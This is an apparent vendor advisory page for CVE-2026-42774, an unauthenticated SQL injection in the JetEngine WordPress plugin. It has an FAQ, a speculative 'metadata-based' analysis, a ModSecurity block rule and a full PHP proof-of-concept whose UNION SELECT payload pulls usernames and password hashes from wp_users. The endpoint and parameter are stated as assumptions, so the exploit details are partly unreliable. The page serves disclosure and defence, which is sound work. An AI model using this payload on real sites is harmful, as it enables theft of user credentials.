What is CVE-2026-42774?

CVE-2026-42774 is a high-severity SQL injection vulnerability found in the JetEngine plugin for WordPress, affecting versions up to 3.8.8.1. It allows unauthenticated attackers to inject arbitrary SQL commands into the database through insufficiently sanitized user input.

How does the SQL injection work?

The vulnerability arises from the plugin’s failure to properly escape user-supplied parameters in SQL queries. Attackers can exploit this by sending crafted HTTP requests to vulnerable endpoints, appending SQL commands that can extract sensitive data from the database.

Who is affected by this vulnerability?

Any WordPress site using the JetEngine plugin version 3.8.8.1 or earlier is at risk. Site administrators should check their plugin version and update if they are using a vulnerable version.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the JetEngine plugin installed on your WordPress site. If it is version 3.8.8.1 or earlier, your site is susceptible to this vulnerability.

What should I do to fix this issue?

To remediate this vulnerability, update the JetEngine plugin to version 3.8.8.2 or later, which includes the necessary fixes. Additionally, review your site’s security practices to ensure proper input validation and escaping.

What does the CVSS score of 7.5 mean?

A CVSS score of 7.5 indicates a high severity level, meaning there is a significant risk of exploitation. This score suggests that successful attacks could lead to the exposure of sensitive information without requiring authentication.

What types of data could be exposed?

Exploitation of this vulnerability could allow attackers to access sensitive data such as WordPress user credentials, including usernames and password hashes, as well as other database contents that JetEngine manages.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can craft a malicious request to the vulnerable AJAX endpoint of JetEngine. It shows how SQL payloads can be injected to extract user information from the database.

What are the common attack vectors for this vulnerability?

Common attack vectors include AJAX actions in JetEngine such as ‘jet_engine_get_filtered_data’, where parameters like ‘offset’ or ‘limit’ can be manipulated to inject SQL commands.

What are the best practices for securing WordPress plugins?

To secure WordPress plugins, always keep them updated to the latest versions, employ security plugins to monitor for vulnerabilities, and regularly audit your site’s code for proper input sanitization and escaping.

Is there a way to mitigate the risk if I cannot update immediately?

If immediate updates are not possible, consider disabling the JetEngine plugin until a safe version is available. Additionally, restrict access to the affected endpoints through server configurations or firewall rules.

Where can I find more information about this vulnerability?

More information about CVE-2026-42774 can be found in the official CVE database, security advisories from plugin developers, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 17, 2026

CVE-2026-42774: JetEngine <= 3.8.8.1 – Unauthenticated SQL Injection (jet-engine)

CVE ID CVE-2026-42774

Plugin jet-engine

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 3.8.8.1

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-42774 (metadata-based):

This vulnerability allows unauthenticated SQL injection in the JetEngine plugin for WordPress, affecting versions up to and including 3.8.8.1. The CVSS score is 7.5 (High), with network-based exploitation requiring no authentication. The vulnerability stems from CWE-89: Improper Neutralization of Special Elements used in an SQL Command.

Root Cause: Based on the CVE description and CWE classification, the vulnerability likely exists in a custom database query within the JetEngine plugin that fails to properly escape user-supplied parameters and lacks prepared statement usage. The insufficient escaping combined with inadequate SQL query preparation allows an attacker to inject arbitrary SQL commands. This is a classic pattern where the plugin constructs SQL queries by concatenating user input directly into the query string, rather than using WordPress’s $wpdb->prepare() method with placeholder substitution. The fact that no authentication is required points to a publicly accessible AJAX handler or REST API endpoint that accepts user input and uses it unsafely in a SQL query.

Exploitation: An unauthenticated attacker can exploit this by sending a crafted HTTP request to the vulnerable endpoint. Based on common JetEngine patterns, the likely attack vector is an AJAX action such as ‘jet_engine_get_map_markers’, ‘jet_engine_get_calendar’, or ‘jet_engine_get_filtered_data’ that accepts numeric or string parameters like ‘term_id’, ‘post_id’, ‘offset’, or ‘limit’. The attacker would inject SQL payloads in these parameters, for example: ‘/wp-admin/admin-ajax.php?action=jet_engine_get_filtered_data&limit=10 UNION SELECT user_pass,user_login,user_email FROM wp_users–‘. The payload would be URL-encoded to bypass basic sanitization but exploit the lack of parameterized queries.

Remediation: The fix requires switching to prepared SQL statements using $wpdb->prepare() with sprintf-style placeholders (%d, %s, %f). All user-supplied values must be passed as parameters to the query method, not concatenated into the SQL string. Additionally, the plugin should validate that all input parameters match expected types (e.g., integers for IDs, enumerated strings for filter types). The patched version 3.8.8.2 likely implements these changes.

Impact: Successful exploitation allows an unauthenticated attacker to extract sensitive database contents. This includes WordPress user credentials (hashed passwords, usernames, emails), session tokens, post content, and any custom data stored in the database by JetEngine. The extracted password hashes can be cracked offline to gain administrative access. The CVSS vector shows a High impact on confidentiality but no impact on integrity or availability (C:H/I:N/A:N).

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-42774 (metadata-based)
# Blocks unauthenticated SQL injection via JetEngine AJAX endpoint
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-42774 - JetEngine SQL Injection via admin-ajax.php',severity:CRITICAL,tag:CVE-2026-42774"
SecRule ARGS_POST:action "@streq jet_engine_get_filtered_data" "chain"
SecRule ARGS_POST:offset|ARGS_POST:limit|ARGS_POST:post_id "@rx (?:bUNIONb|bSELECTb|bFROMb|bORs+1=1|bANDs+1=1|'\s*OR|'\s*AND|bSLEEPs*(|bBENCHMARKs*()" "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-42774 - JetEngine <= 3.8.8.1 - Unauthenticated SQL Injection

/*
 * Assumptions:
 * - The vulnerable endpoint is WP AJAX handler 'jet_engine_get_filtered_data'
 * - The vulnerable parameter is 'offset' (or 'limit') which is concatenated directly into SQL
 * - WordPress database prefix is 'wp_'
 * - The injected UNION selects from wp_users
 */

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL

$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';

// SQL injection payload: UNION to extract usernames and password hashes
$sql_payload = "1 UNION SELECT user_login,user_pass,user_email,user_nicename,user_registered,display_name,user_url,user_status FROM wp_users-- ";

$params = array(
    'action' => 'jet_engine_get_filtered_data',
    'offset' => $sql_payload,
    'limit'  => '1',
    'post_id' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: " . $http_code . "n";
echo "Response Body:n" . $response . "n";

if (strpos($response, 'wp_users') !== false || strpos($response, '$P$B') !== false || strpos($response, '$2y$') !== false) {
    echo "[+] Potential SQL injection successful! Check response for user credentials.n";
} else {
    echo "[-] No clear sign of successful injection in response. Adjust payload and parameters.n";
}
?>

Frequently Asked Questions

What is CVE-2026-42774?
Overview of the vulnerability
CVE-2026-42774 is a high-severity SQL injection vulnerability found in the JetEngine plugin for WordPress, affecting versions up to 3.8.8.1. It allows unauthenticated attackers to inject arbitrary SQL commands into the database through insufficiently sanitized user input.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to properly escape user-supplied parameters in SQL queries. Attackers can exploit this by sending crafted HTTP requests to vulnerable endpoints, appending SQL commands that can extract sensitive data from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the JetEngine plugin version 3.8.8.1 or earlier is at risk. Site administrators should check their plugin version and update if they are using a vulnerable version.
How can I check if my site is vulnerable?
Version verification steps
To determine if your site is vulnerable, check the version of the JetEngine plugin installed on your WordPress site. If it is version 3.8.8.1 or earlier, your site is susceptible to this vulnerability.
What should I do to fix this issue?
Remediation steps
To remediate this vulnerability, update the JetEngine plugin to version 3.8.8.2 or later, which includes the necessary fixes. Additionally, review your site’s security practices to ensure proper input validation and escaping.
What does the CVSS score of 7.5 mean?
Understanding risk levels
A CVSS score of 7.5 indicates a high severity level, meaning there is a significant risk of exploitation. This score suggests that successful attacks could lead to the exposure of sensitive information without requiring authentication.
What types of data could be exposed?
Potential impact of exploitation
Exploitation of this vulnerability could allow attackers to access sensitive data such as WordPress user credentials, including usernames and password hashes, as well as other database contents that JetEngine manages.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided illustrates how an attacker can craft a malicious request to the vulnerable AJAX endpoint of JetEngine. It shows how SQL payloads can be injected to extract user information from the database.
What are the common attack vectors for this vulnerability?
Identifying likely exploitation methods
Common attack vectors include AJAX actions in JetEngine such as ‘jet_engine_get_filtered_data’, where parameters like ‘offset’ or ‘limit’ can be manipulated to inject SQL commands.
What are the best practices for securing WordPress plugins?
Preventive measures
To secure WordPress plugins, always keep them updated to the latest versions, employ security plugins to monitor for vulnerabilities, and regularly audit your site’s code for proper input sanitization and escaping.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the JetEngine plugin until a safe version is available. Additionally, restrict access to the affected endpoints through server configurations or firewall rules.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-42774 can be found in the official CVE database, security advisories from plugin developers, and security-focused blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations